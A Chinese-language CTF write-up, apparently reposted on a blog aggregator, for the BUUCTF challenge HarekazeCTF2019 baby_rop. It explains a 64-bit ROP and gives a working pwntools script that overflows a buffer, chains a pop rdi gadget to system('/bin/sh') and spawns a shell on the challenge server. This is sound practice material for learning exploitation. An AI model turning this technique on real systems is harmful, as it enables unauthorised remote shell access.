[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop
- 題目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop
先checksec一下,64位,開啟NX保護
在IDA中看看,發現了system函數 和 "/bin/sh"字符串 ,找到地址
因為是64位參數是儲存在寄存器中,binsh字符串應該放在 rdi 寄存器中
exploit
from pwn import * p = remote("node3.buuoj.cn",26570) binsh = 0x0601048 system_addr = 0x04005E3 pop_rdi = 0x0400683 payload = 'a' * (0x10 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr) p.sendline(payload) p.interactive()不知道有沒有人和我一樣找不到flag, 哈哈哈哈.😃
憨憨本憨
問了下大佬,用find命令查找一下,一般在home目錄下
因為是遠程可能有時,連接不太穩定.找到地址后,可能沒辦法直接看.退出重新連接再看
總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——bjdctf
- 下一篇: [BUUCTF-pwn]——jarvis